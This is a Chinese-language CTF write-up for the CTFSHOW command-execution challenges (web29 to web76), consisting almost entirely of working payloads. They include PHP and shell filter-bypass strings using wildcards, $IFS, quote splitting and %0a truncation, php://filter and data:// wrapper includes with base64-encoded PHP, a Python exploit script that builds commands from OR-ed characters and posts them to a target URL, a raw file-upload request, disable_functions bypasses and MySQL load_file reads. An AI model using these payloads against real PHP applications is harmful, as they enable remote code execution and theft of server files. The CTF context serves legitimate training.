[原创]CTFSHOW命令执行WP

2021-9-22 17:26 26411

[原创]CTFSHOW命令执行WP

H3h3QAQ

2021-9-22 17:26

26411

CTFSHOW命令执行

web29

过滤了flag

payload：

随便写几个姿势

/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了

web30

过滤了flag|system|php

用echo 反引号来执行命令

payload：

/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php

web31

过滤了flag|system|php|cat|sort|shell|\.| |

没关系，我们有都是姿势

payload：

/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

web32

include不用括号，分号可以用?>代替。

payload：

/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web33-36

payload：

/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web37

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;    
    }
}else{
    highlight_file(__FILE__);
}

payload：

1 2	`/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==` `/?c=data://text/palin,<?php system("nl fla*");?>`

web38

过滤了flag

payload：

1	`/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==`

web39

payload：

1	`/?c=data://text/palin,<?php%20system("nl%20f*");?>`

web40-41

理论上是异或

然后我懒

贴exp：

import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
    for j in range(256):
        if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
            k = i | j
            if k>=32 and k<=126:
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)

# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php")  #没有将php写入环境变量需手动运行
if(len(argv)!=2):
    print("="*50)
    print('USER：python exp.py <url>')
    print("eg：  python exp.py http://ctf.show/")
    print("="*50)
    exit(0)
url=argv[1]
def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("rce_or.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"|\""+s2+"\")"
    return(output)
 
while True:
    param=action(input("\n[+] your function：") )+action(input("[+] your command："))
    data={
        'c':urllib.parse.unquote(param)
        }
    r=requests.post(url,data=data)
    print("\n[*] result:\n"+r.text)

exp取自https://wp.ctf.show/d/137-ctfshow-web-web41/4

web42

/dev/null 2>&1，让所有的输出流（包括错误的和正确的）都定向到空设备丢弃

%0a、%26、||截断

payload：

/?c=nl%20*%0a
= =姿势就不写那么多了
截断后看过滤自由发挥

web43

过滤了;|cat

payload：

1	`/?c=nl%20*%0a`

web44

多过滤了个flag

通配符搞定

payload：

1	`/?c=nl%20*%0a`

web45

空格被过滤了

payload：

1	`/?c=nl$IFS*%0a`

web46-49

过滤了\;|cat|flag| |[0-9]|\\$|\*/

payload：

/?c=nl%09fla\g.php||
/?c=nl%09fla\g.php%0a
/?c=nl%09fla''g.php%0a
/?c=nl%09fla""g.php%0a
/?c=vi%09fla\g.php%0a
/?c=tac%09fla\g.php%0a
/?c=uniq%09fla\g.php%0a
/?c=nl<fla''g.php||
/?c=nl%09fla\g.php%26

web50-51

payload：

1	`/?c=nl<fla%27%27g.php\|\|`

web52

payload：

1	`/?c=nl${IFS}/fl""ag%0a`

web53

payload：

/?c=nl${IFS}fla%''g.p''hp
/?c=ca''t${IFS}fl??????
/?c=ca''t${IFS}fl''ag.p''hp
应该还有其他姿势

web54

payload：

/?c=mv${IFS}fla?.php${IFS}t.tx''t
爷给他改个名
/?c=/bin/?at${IFS}f???????

web55

= = 只能是数字

对不起骚套路开始

payload：

1	`/?c=/???/????64+????.???`

web56

https://blog.csdn.net/qq_46091464/article/details/108513145

数据包：

POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: 6595d4e2-edc5-4ff4-a08b-c93d2f563732.challenge.ctf.show:8080
Content-Length: 329
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydZeuVbMPZVcyvpNM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
 
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream
 
#!/bin/sh
cat /var/www/html/flag.php
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="submit"
 
111
------WebKitFormBoundarydZeuVbMPZVcyvpNM--

web58

凑36

-37取反=36

payload：

$((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))))))

web59

绕过disable_functions

我只想到一种

file可以把文件读取到一个数组，再打印出来

payload：

c=var_dump(file('flag.php'));
c=highlight_file("flag.php");
c=show_source('flag.php');

web60-65

payload：

1 2	`c=highlight_file("flag.php");` `c=show_source('flag.php');`

web66

payload：

c=var_dump(scandir("/"));
扫描到flag 是txt
然后日他妈的
c=highlight_file('/flag.txt');

web67-70

= = 好家伙

ban的真多

payload：

c=include('/flag.txt');
c=require('/flag.txt');
c=require_once('/flag.txt');

web71

ob_get_contents — 返回输出缓冲区的内容 ob_end_clean — 清空（擦除）缓冲区并关闭输出缓冲

此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容，必须在ob_end_clean()之前调用ob_get_contents()，因为当调用ob_end_clean()时缓冲区内容将被丢弃。

https://blog.csdn.net/solitudi/article/details/109837640?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163062881716780269897928%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163062881716780269897928&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-109837640.first_rank_v2_pc_rank_v29&utm_term=y4tacker+%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1018.2226.3001.4187 y4的blog说的很清楚

payload：

1	`c=include('/flag.txt');;exit();`

web72

看一下y4的blog就可以了= = payload不贴了太长了。

##web73

c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

看一下目录

然后

payload：

1	`c=include('/flagc.txt');exit();`

web74

同73题

web75-76

扫目录

1	`c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);`

mysql load_file读文件

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);